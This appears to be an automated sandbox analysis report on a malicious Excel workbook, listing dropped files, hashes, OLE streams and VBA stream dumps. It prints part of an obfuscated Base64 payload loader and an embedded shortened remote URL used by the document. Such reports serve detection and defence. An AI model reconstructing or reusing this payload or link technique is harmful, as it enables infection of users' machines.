                                                        Preview:' Main script logic for processing Base64-encoded data....' Initialize the Base64 encoded string (placeholder)..Dim encodedBase64String..encodedBase64String = "));;;qQ@@@@M@@@@@@@@E@@@@@@@@//8@@@@Lg@@@@@@@@@@@@@@@@@@Q@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@g@@@@@@@@@@4fug4@@t@@nNIbg...))M0h;;;Ghpcy...wcm9ncmFtIGNhbm5vdC...iZS...ydW4gaW4gRE9))IG1vZGUuDQ0K&&&@@@@@@@@@@@@@@@@@@...QRQ@@@@))@@ED@@Fvx9GY@@@@@@@@@@@@@@@@@@@@O@@@@DgEL@@))@@@@@@I@@@@@@@@C8@@@@@@@@@@@@@@@@Ep4@@@@@@@@g@@@@@@@@o@@@@@@@@@@...@@@@@@@@g@@@@@@@@@@g@@@@...@@@@@@@@@@@@@@@@@@@@E@@@@@@@@@@@@@@@@@@@@@@@@@@Q@@@@@@g@@@@@@@@@@@@@@@@I@@YIU@@@@...@@@@@@...@@@@@@@@@@@@E@@@@@@E@@@@@@@@@@@@@@@@...@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@Lid@@@@...X@@@@@@@@@@M@@@@@@@@Q7@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@K@@@@@@@@w@@@@@@CwSQ@@@@H@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@I@@@@@@C@@@@@@@@@@@@@@@@@@@@@@@

                                                        C:\Users\user\Desktop\0DE30000

                                                        Download File
                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Sep 27 09:27:54 2024, Security: 1
                                                        Category:dropped
                                                        Size (bytes):725504
                                                        Entropy (8bit):7.97783459718104
                                                        Encrypted:false
                                                        SSDEEP:12288:KT5UOAsHFnd7HeT/o8gg8Rsfe8sEEn4ixnUNS2OdfMYwtgcRqIcKaq:qLpsAbg8RgEn1xnmMdfXwzdcU
                                                        MD5:A59A6D39E0AE0E415943EC229CA37287
                                                        SHA1:C0FF4621D3545162848EF1E3EDDAEF823C65E6B2
                                                        SHA-256:DFAD0A907D75A27DC0EDFE2954F2C78DD9C7B1471F854372E734B32FC38FCE2F
                                                        SHA-512:5DF87F460E146B1C2918DE7B1CA3C740D009DB88BADAA436A326CEE867AD215128CB2BC65D2110E7A72B8F846D8AF0ABCC8DDF98A94696CD9648FA9F05CC6607
                                                        Malicious:false
                                                        Preview:......................>...................................w...................................y.......{.......}........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                                                        C:\Users\user\Desktop\0DE30000:Zone.Identifier

                                                        Download File
                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):26
                                                        Entropy (8bit):3.95006375643621
                                                        Encrypted:false
                                                        SSDEEP:3:ggPYV:rPYV
                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                        Malicious:false
                                                        Preview:[ZoneTransfer]....ZoneId=0

                                                        C:\Users\user\Desktop\QT2Q1292.xla.xls (copy)

                                                        Download File
                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Sep 27 09:27:54 2024, Security: 1
                                                        Category:dropped
                                                        Size (bytes):725504
                                                        Entropy (8bit):7.97783459718104
                                                        Encrypted:false
                                                        SSDEEP:12288:KT5UOAsHFnd7HeT/o8gg8Rsfe8sEEn4ixnUNS2OdfMYwtgcRqIcKaq:qLpsAbg8RgEn1xnmMdfXwzdcU
                                                        MD5:A59A6D39E0AE0E415943EC229CA37287
                                                        SHA1:C0FF4621D3545162848EF1E3EDDAEF823C65E6B2
                                                        SHA-256:DFAD0A907D75A27DC0EDFE2954F2C78DD9C7B1471F854372E734B32FC38FCE2F
                                                        SHA-512:5DF87F460E146B1C2918DE7B1CA3C740D009DB88BADAA436A326CEE867AD215128CB2BC65D2110E7A72B8F846D8AF0ABCC8DDF98A94696CD9648FA9F05CC6607
                                                        Malicious:false
                                                        Preview:......................>...................................w...................................y.......{.......}........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                                                        C:\Users\user\Desktop\~$QT2Q1292.xla.xlsx

                                                        Download File
                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                        File Type:data
                                                        Category:modified
                                                        Size (bytes):165
                                                        Entropy (8bit):1.4377382811115937
                                                        Encrypted:false
                                                        SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                                        MD5:797869BB881CFBCDAC2064F92B26E46F
                                                        SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                                        SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                                        SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                                        Malicious:true
                                                        Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                        Static File Info

                                                        General

                                                        File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Sep 26 07:06:02 2024, Security: 1
                                                        Entropy (8bit):7.967739609901458
                                                        TrID:
                                                        • Microsoft Excel sheet (30009/1) 47.99%
                                                        • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                                        • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                                        File name:QT2Q1292.xla.xlsx
                                                        File size:723'456 bytes
                                                        MD5:330b3a06df61fa152ea115447ea00c73
                                                        SHA1:99cf1cd78b14c95083c63c832f8edd3a90b047cc
                                                        SHA256:17bc6d992ad4b0fd62bffda1ca6be76674837c2a15122b2547436db5ba827692
                                                        SHA512:16a284d19681f6609f935a5c58dbbaeb314fbbfb95bd5f83684ef5f16c7df7b074043f9897f789ffc84440f70967febf7fad7aeed7a1c4048047f1e95a72b9c5
                                                        SSDEEP:12288:2+UOAsHFnd7HeT/o8gg8Rsfe8vfOuaPIvtsxjzX5PV/RbkUf1Gj+wzggD:2epsAbg8RUfOu4IvMzpPRf4+8n
                                                        TLSH:23F4122BF5D48611C0D2D83D17D85282156EFC054BEAAF033B457BFC3A7E5309A9629E
                                                        File Content Preview:........................>...............................................................................c.......e..............................................................................................................................................

                                                        File Icon

                                                        Icon Hash:2562ab89a7b7bfbf

                                                        Static OLE Info

                                                        General

                                                        Document Type:OLE
                                                        Number of OLE Files:1

                                                        OLE File "QT2Q1292.xla.xlsx"

                                                        Indicators
                                                        Has Summary Info:
                                                        Application Name:Microsoft Excel
                                                        Encrypted Document:True
                                                        Contains Word Document Stream:False
                                                        Contains Workbook/Book Stream:True
                                                        Contains PowerPoint Document Stream:False
                                                        Contains Visio Document Stream:False
                                                        Contains ObjectPool Stream:False
                                                        Flash Objects Count:0
                                                        Contains VBA Macros:True
                                                        Summary
                                                        Code Page:1252
                                                        Author:
                                                        Last Saved By:
                                                        Create Time:2006-09-16 00:00:00
                                                        Last Saved Time:2024-09-26 06:06:02
                                                        Creating Application:Microsoft Excel
                                                        Security:1
                                                        Document Summary
                                                        Document Code Page:1252
                                                        Thumbnail Scaling Desired:False
                                                        Contains Dirty Links:False
                                                        Shared Document:False
                                                        Changed Hyperlinks:False
                                                        Application Version:786432

                                                        Streams with VBA

                                                        VBA File Name: Sheet1.cls, Stream Size: 977
                                                        General
                                                        Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                                                        VBA File Name:Sheet1.cls
                                                        Stream Size:977
                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . % v . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                                                        Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 d5 25 76 a6 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                        VBA Code
                                                        Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                        VBA File Name: Sheet2.cls, Stream Size: 977
                                                        General
                                                        Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                                                        VBA File Name:Sheet2.cls
                                                        Stream Size:977
                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . % - y . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
                                                        Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 d5 25 2d 79 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                        VBA Code
                                                        Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                        VBA File Name: Sheet3.cls, Stream Size: 977
                                                        General
                                                        Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                                                        VBA File Name:Sheet3.cls
                                                        Stream Size:977
                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . % 6 + . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
                                                        Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 d5 25 36 2b 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                        VBA Code
                                                        Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                        VBA File Name: ThisWorkbook.cls, Stream Size: 985
                                                        General
                                                        Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                                        VBA File Name:ThisWorkbook.cls
                                                        Stream Size:985
                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . % . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - . 0
                                                        Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 d5 25 ff 81 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                        VBA Code
                                                        Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                        Streams

                                                        Stream Path: \x1CompObj, File Type: data, Stream Size: 114
                                                        General
                                                        Stream Path:\x1CompObj
                                                        CLSID:
                                                        File Type:data
                                                        Stream Size:114
                                                        Entropy:4.25248375192737
                                                        Base64 Encoded:True
                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                        Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                        Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 244
                                                        General
                                                        Stream Path:\x5DocumentSummaryInformation
                                                        CLSID:
                                                        File Type:data
                                                        Stream Size:244
                                                        Entropy:2.889430592781307
                                                        Base64 Encoded:False
                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                                                        Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                                                        Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 200
                                                        General
                                                        Stream Path:\x5SummaryInformation
                                                        CLSID:
                                                        File Type:data
                                                        Stream Size:200
                                                        Entropy:3.250350317504982
                                                        Base64 Encoded:False
                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . . . * . . . . . . . . . .
                                                        Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                                                        Stream Path: MBD00065630/\x1CompObj, File Type: data, Stream Size: 99
                                                        General
                                                        Stream Path:MBD00065630/\x1CompObj
                                                        CLSID:
                                                        File Type:data
                                                        Stream Size:99
                                                        Entropy:3.631242196770981
                                                        Base64 Encoded:False
                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
                                                        Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                        Stream Path: MBD00065630/Package, File Type: Microsoft Excel 2007+, Stream Size: 323368
                                                        General
                                                        Stream Path:MBD00065630/Package
                                                        CLSID:
                                                        File Type:Microsoft Excel 2007+
                                                        Stream Size:323368
                                                        Entropy:7.985201154157948
                                                        Base64 Encoded:True
                                                        Data ASCII:P K . . . . . . . . . . ! . . . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                        Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 94 ec d8 8a aa 01 00 00 c0 06 00 00 13 00 d6 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 d2 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                        Stream Path: MBD00065631/\x1Ole, File Type: data, Stream Size: 364
                                                        General
                                                        Stream Path:MBD00065631/\x1Ole
                                                        CLSID:
                                                        File Type:data
                                                        Stream Size:364
                                                        Entropy:6.491450646846212
                                                        Base64 Encoded:False
                                                        Data ASCII:. . . . b x . . . . . . . . . . . . . . . . . y . . . K . . . . h . t . t . p . s . : . / . / . s . t . r . m . r . . . c . o . / . B . g . 7 . U . Y . E . . . G . . . h . Z B . M . ! . = N ~ 1 b D . w . R . | O % ( . . @ . 0 k . . . e K . . 0 < 8 ] t . ? v . a [ . l 5 F ` a r 1 P . , % F 5 W f m i T . Q . z } ` . . ( $ y L H . . v : p } . w W 9 { ? z D + . . . . . . . . . . . . . . . . . . . . a . K . 8 . e . o . T . d . S . p . . . C ' { . P O . ! & w . . H 7
                                                        Data Raw:01 00 00 02 a9 d4 62 78 c6 1a a7 10 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b f4 00 00 00 68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 73 00 74 00 72 00 6d 00 72 00 2e 00 63 00 6f 00 2f 00 42 00 67 00 37 00 55 00 59 00 45 00 00 00 e4 9f 47 e8 0e 1e aa fe c0 c5 d2 08 68 9f de 1c a7 5a 42 92 91 8c 02 4d f2 eb fd eb 87 97 21 13
                                                        Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 379917
                                                        General
                                                        Stream Path:Workbook
                                                        CLSID:
                                                        File Type:Applesoft BASIC program data, first line number 16
                                                        Stream Size:379917
                                                        Entropy:7.99897282082189
                                                        Base64 Encoded:True
                                                        Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . . _ . E Q . u n | . Z 3 . . . . z & f } ? 1 . \\ . ` ' . . . . . . . . . . 0 . . . \\ . p . p a . r 4 . % x . J . . b T @ C Q O 9 J r . . . . > . @ K . . e . M . H U _ q [ . m w ` 3 R h " N 0 Q A . | . \\ B . . . a . . . . . . . = . . . P S . . . . . . , ^ 3 . . # . & . . . . . . . h . . . . . . . . y . . . Q \\ . . . . J = . . . . ) . . . - . . 4 A 0 @ . . . . . . . . Z " . . . . . . . V . . . ] & . . . 1 . . . . . . . # M k : T + . 6 . 1 . u t m 1 . . .
                                                        Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 b4 04 5f fc 10 f5 45 51 c7 b3 75 6e b7 7c cc 81 c1 5a 33 0d a2 08 18 0d 8e a0 7a 26 66 e1 bc 7d fb ab 3f fa e5 31 11 5c c8 81 b9 8c fe 60 c7 27 87 00 00 00 e1 00 02 00 b0 04 c1 00 02 00 f1 30 e2 00 00 00 5c 00 70 00 c9 70 61 1a 72 34 d8 92 25 78 13 f1 4a 14 82 00 62 ab f0 54 82 40 bf 43 91 51
                                                        Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 527
                                                        General
                                                        Stream Path:_VBA_PROJECT_CUR/PROJECT
                                                        CLSID:
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Stream Size:527
                                                        Entropy:5.269285940145925
                                                        Base64 Encoded:True
                                                        Data ASCII:I D = " { 3 8 3 2 6 D A 8 - C 3 6 9 - 4 8 3 6 - B 4 3 E - A C A 0 2 1 A E F 2 C 7 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 5 C 5 E B B 4 7 B F 4 D C 3 4 D C
                                                        Data Raw:49 44 3d 22 7b 33 38 33 32 36 44 41 38 2d 43 33 36 39 2d 34 38 33 36 2d 42 34 33 45 2d 41 43 41 30 32 31 41 45 46 32 43 37 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                                                        Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 104
                                                        General
                                                        Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                                                        CLSID:
                                                        File Type:data
                                                        Stream Size:104
                                                        Entropy:3.0488640812019017
                                                        Base64 Encoded:False
                                                        Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                                                        Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
                                                        Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2644
                                                        General
                                                        Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                                        CLSID:
                                                        File Type:data
                                                        Stream Size:2644
                                                        Entropy:3.9802812936729834
                                                        Base64 Encoded:True
                                                        Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                                                        Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                                                        Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 553
                                                        General
                                                        Stream Path:_VBA_PROJECT_CUR/VBA/dir
                                                        CLSID:
                                                        File Type:data
                                                        Stream Size:553
                                                        Entropy:6.356862187459324
                                                        Base64 Encoded:True
